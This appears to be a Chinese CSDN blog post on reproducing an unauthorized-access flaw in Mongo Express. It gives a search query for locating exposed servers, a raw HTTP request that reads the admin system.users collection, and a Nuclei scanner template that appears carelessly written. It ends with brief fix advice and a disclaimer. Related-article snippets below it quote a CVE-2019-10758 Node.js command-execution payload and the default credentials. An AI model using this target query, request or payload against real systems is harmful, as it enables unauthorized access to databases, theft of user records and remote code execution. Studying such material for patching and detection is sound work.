Mongo Express 未授权访问漏洞

最新推荐文章于 2024-09-24 20:41:41 发布
最新推荐文章于 2024-09-24 20:41:41 发布
阅读量355 收藏 1
点赞数 2
文章标签: express 漏洞挖掘 数据库 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80127209/article/details/139963263
版权

【产品&&漏洞简述】

Mongo Express 是一个基于 Node.js 和 express 的开源的 MongoDB Web管理界面。Mongo Express存在未授权访问漏洞,攻击者可通过该漏洞获取用户信息或修改系统数据。

【资产测绘Query】

 

  1. title="Home - Mongo Express"
 

 

 

【产品界面】
 

 

 

【漏洞复现】
 

【poc】
 

 

  1. GET /db/admin/system.users HTTP/1.1
  2. Host:
  3. Upgrade-Insecure-Requests: 1
  4. Accept-Encoding: gzip, deflate
  5. If-None-Match: W/"5e20-VrulkRjFFAf+sQ5IpKaq4NjOD4E"
  6. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
  7. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  8. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  9. Cookie: mongo-express=s%3AaH0WpZ2GRKB665ZQKhEnS98aZA5mUtId.WHpfctkSF3uWQChONtpocl8cdsU26scI0WDBOeNdtIQ
 

 

 

【Nuclei-Poc验证】
 

 

  1. id: mongo-expressress-unauthorized
  3. info:
  4. name: Mongo Express unauthorized
  5. author: admin
  6. severity: high
  7. description: description
  8. reference:
  9. - https://
  10. tags: tags
  12. http:
  13. - raw:
  14. - |+
  15. GET /db/admin/system.users HTTP/1.1
  16. Host: {{Hostname}}
  17. Upgrade-Insecure-Requests: 1
  18. Accept-Encoding: gzip, deflate
  19. If-None-Match: W/"5e20-VrulkRjFFAf+sQ5IpKaq4NjOD4E"
  20. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
  21. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  22. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  23. Cookie: mongo-express=s%3AaH0WpZ2GRKB665ZQKhEnS98aZA5mUtId.WHpfctkSF3uWQChONtpocl8cdsU26scI0WDBOeNdtIQ
  24. Connection: close
  27. matchers-condition: and
  28. matchers:
  29. - type: word
  30. part: body
  31. words:
  32. - ''
  33. - type: status
  34. status:
  35. - 304
 

 

 

【修复建议】
 

1、请联系厂商进行修复。
 2、如非必要,禁止公网访问该系统。
 3、设置白名单访问。
 

 申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。
 

免费领取安全学习资料包!
 

渗透工具
 

 

技术文档、书籍
 

 
 

 

面试题
 

帮助你在面试中脱颖而出
 

 

视频
 

基础到进阶
 

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等
 

 
 

 

应急响应笔记
 

 

学习路线
 


                

        

        

    

  


    

      

        

            

              
                
                  运维Z叔
                
              
            

            

                关注
              
            

        

        

          
      

      









                



	

		

			

				
					
常见的系统漏洞

				
			

			

				

					qq_40907977的博客
				

				

					02-08
					
					4764
					
				

			

		

		

			
				
完待续
1、Linux软件漏洞
2、Windows系统漏洞
3、Web-CMS漏洞
4、应用漏洞
应用漏洞
勒索软件、挖矿病毒和网站后门等威胁会利用包括Apache、Redis、Docker、ElasticSearch等应用漏洞入侵主机,对应用层的漏洞进行定期、及时的检测加固可以有效对这些威胁攻击进行防御,建议您升级到企业版来取得包括应用漏洞检测在内的所有高级功能。
5、应急漏洞
比如 :mon...

			
		

	



                

              
                



	

		

			

				
					
【OK】记某地级市护网的攻防演练行动

					
最新发布

				
			

			

				

					Lucker_YYY的博客
				

				

					10-01
					
					1030
					
				

			

		

		

			
				
哈喽,师傅们!这次给师傅们分享的是上上个星期的地级市护网的攻防演练的两个案例,涉及到的知识点可能比较偏,下面我也会提前给师傅们拓展下改漏洞相关的知识点内容。护网攻防演练中,涉及到的很多敏感内容这里会进行打码操作,然后这里简单给师傅们分享下两个攻防演练中的真实案例,也让没有打过红队攻防演练的师傅们学习下,感受下思路过程。•kkFileView为文件文档在线预览解决方案,该项目使用流行的spring boot搭建,易上手和部署,基本支持主流办公文档的在线预览。

			
		

	



                


  
              

                


	

		

			

				
					
mongo-express 远程代码执行漏洞复现

				
			

			

				

					Tauil的博客
				

				

					07-30
					
					1142
					
				

			

		

		

			
				
方法没有进行检验,导致在知晓用户密码情况下可以执行js代码。js文件中定义了该页面访问路径在。同时数据包需要新增类型。打开靶场vulhub。登录网页,发送数据包。

			
		

	





	

		

			

				
					
mongo-express 远程代码执行漏洞(CVE-2019-10758)

				
			

			

				

					EC_Carrot的博客
				

				

					07-13
					
					593
					
				

			

		

		

			
				
漏洞复现
如果攻击者可以成功登录,或者目标服务器没有修改默认的账号密码(admin:pass),则可以执行任意node.js代码
直接发送如下数据包,即可执行代码this.constructor.constructor("return process"().mainModule.require("child_process").execSync("touch /tmp/success")
POST /checkValid HTTP/1.1
Host: your-ip
Accept-Encoding: gzi

			
		

	



		

			
		



	

		

			

				
					
mongo-express 远程代码执行漏洞 CVE-2019-10758 漏洞复现

				
			

			

				

					ADummy的博客
				

				

					03-04
					
					531
					
				

			

		

		

			
				
mongo-express 远程代码执行漏洞(CVE-2019-10758)
by ADummy
0x00利用路线
​			Burpsuite发包—>命令执行
0x01漏洞介绍
​		mongo-express是一款mongodb的第三方Web界面,使用node和express开发。如果攻击者可以成功登录,或者目标服务器没有修改默认的账号密码(admin:pass),则可以执行任意node.js代码。
0x 02漏洞复现




...

			
		

	





	

		

			

				
					
express小bug

				
			

			

				

					夜辉的博客
				

				

					12-04
					
					226
					
				

			

		

		

			
				
练习express时遇到了一个小bug,修改它居然花了我两小时,想想还是应该把它写下来,以免以后再犯,并将一些知识点进行总结。
app.use('/node_modules/', express.static('./node_modules'))
app.use('/public/', express.static('./public'))

该代码用于开放资源包,
官方解释为
以下是 在Expr...

			
		

	





	

		

			

				
					
express中间件当做前端服务器的安全漏洞处理

				
			

			

				

					qq_37819292的博客
				

				

					02-27
					
					1543
					
				

			

		

		

			
				
*	此文档只是说明记录关键步骤。具体实现代码可参照附件。**

			
		

	





	

		

			

				
					
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等

				
			

			

				

					weixin_46280935的博客
				

				

					09-10
					
					5603
					
				

			

		

		

			
				
Penetration_Testing_POC

搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。

Penetration_Testing_POC
	请善用搜索[Ctrl+F]查找
	IOT Device&Mobile Phone
	Web APP
	提权辅助相关
	PC
	tools-小工具集合
	文章/书籍/教程相关
	说明
请善用搜索[Ctrl+F]查找

IOT Device&Mobile Phone

天翼创维awifi路由器存在多处授权访问

			
		

	





	

		

			

				
					
【无标题】

				
			

			

				

					Lucker_YYY的博客
				

				

					09-24
					
					839
					
				

			

		

		

			
				
哈喽,师傅们!护网攻防演练中,涉及到的很多敏感内容这里会进行打码操作,然后这里简单给师傅们分享下两个攻防演练中的真实案例,也让没有打过红队攻防演练的师傅们学习下,感受下思路过程。•kkFileView为文件文档在线预览解决方案,该项目使用流行的spring boot搭建,易上手和部署,基本支持主流办公文档的在线预览。

			
		

	





	

		

			

				
					
红队系列-网络安全知识锦囊(持续更新)

				
			

			

				

					aming小老弟
				

				

					11-09
					
					1271
					
				

			

		

		

			
				
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。

			
		

	





	

		

			

				
					
浅谈Node.js CVE-2017-14849 漏洞分析(详细步骤)

				
			

			

				

					10-19
				

			

		

		

			
				
主要介绍了浅谈Node.js CVE-2017-14849 漏洞分析(详细步骤),小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧

			
		

	





	

		

			

				
					
mongo-express远程代码执行漏洞

				
			

			

				

					dys_ddnh的博客
				

				

					12-23
					
					188
					
				

			

		

		

			
				
mongo-express远程代码执行漏洞
配置环境查看此链接
在mongo-express漏洞所在目录下运行测试环境
sudo docker-compose up -d

环境启动后,访问http://your-ip:8081即可查看到Web页面。

漏洞复现
直接发送如下数据包,即可执行代
this.constructor.constructor(“return process”)().mainModule.require(“child_process”).execSync(“touch /tmp/su

			
		

	





	

		

			

				
					
Vulhub Mongo-Express 远程代码执行漏洞复现

				
			

			

				

					weixin_53696027的博客
				

				

					06-06
					
					418
					
				

			

		

		

			
				
关于Mongo-Express 远程代码执行漏洞复现

			
		

	





	

		

			

				
					
node.js+Express计算机毕业设计常见Web漏洞对应PC应用系统(程序+LW+部署)

				
			

			

				

					node-php毕设程序源码
				

				

					01-14
					
					183
					
				

			

		

		

			
				
该项目含有源码、文档、程序、数据库、配套开发软件、软件安装教程。欢迎交流项目运行环境配置:。项目技术:Express框架 + Node.js+ Vue 等等组成,B/S模式 +Vscode管理+前后端分离等等。环境需要1.运行环境:最好是Nodejs最新版,我们在这个版本上开发的。其他版本理论上也可以。2.开发环境:Vscode或HbuilderX都可以。推荐HbuilderX;3.mysql环境:建议是用5.7版本均可4.硬件环境:windows 7/8/10 1G内存以上。

			
		

	





	

		

			

				
					
 一个express老系统csrf漏洞修复

				
			

			

				

					weixin_34138139的博客
				

				

					04-10
					
					364
					
				

			

		

		

			
				
一个运行快两年的express框架web系统,被安全部门审核存在csrf漏洞,项目使用的前后端分离的形式,所有功能操作,通过ajax调用后端接口来完成,查了很多资料,一个基本的防御思想就是验证随机数了,为什么随机数就可以实现csrf的防御呢?本文将针对该问题进行分解
什么是csrf
csrf(跨站请求伪造)是一种网络攻击方式,怎么实现这种...

			
		

	





	

		

			

				
					
express

				
			

			

				

					Wang_0_的博客
				

				

					01-14
					
					1724
					
				

			

		

		

			
				
express


1.创建方式

(1)导入express模块

var express=require('express');

(2) 调用方法,返回app

var app=express();

(3)端口监听 最后执行

app.listen(55555);//异步
2.定义方式 
根据不同的客户端请求,返回不同的响应
3.app上的方法(app本质:请求监听函数)

get

app

			
		

	





	

		

			

				
					
HTB_NodeBlog

				
			

			

				

					weixin_44193247的博客
				

				

					10-01
					
					3111
					
				

			

		

		

			
				
HTB_学习篇

			
		

	





	

		

			

				
					
【VulnHub靶场】——CHRONOS: 1

					
热门推荐

				
			

			

				

					Demo不是emo的博客
				

				

					12-31
					
					1万+
					
				

			

		

		

			
				
24次系统性打靶第三次训练,每次打靶后都会分享靶场攻略和总结的知识点

			
		

	





	

		

			

				
					
docker 安装mongo express

				
			

			

				

					12-12
				

			

		

		

			
				
以下是使用Docker安装Mongo Express的步骤:  1.首先,使用以下命令搜索可用的Mongo镜像: ```shell docker search mongo ...4.最后,使用浏览器访问`http://localhost:8081`,即可进入Mongo Express的管理界面。

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值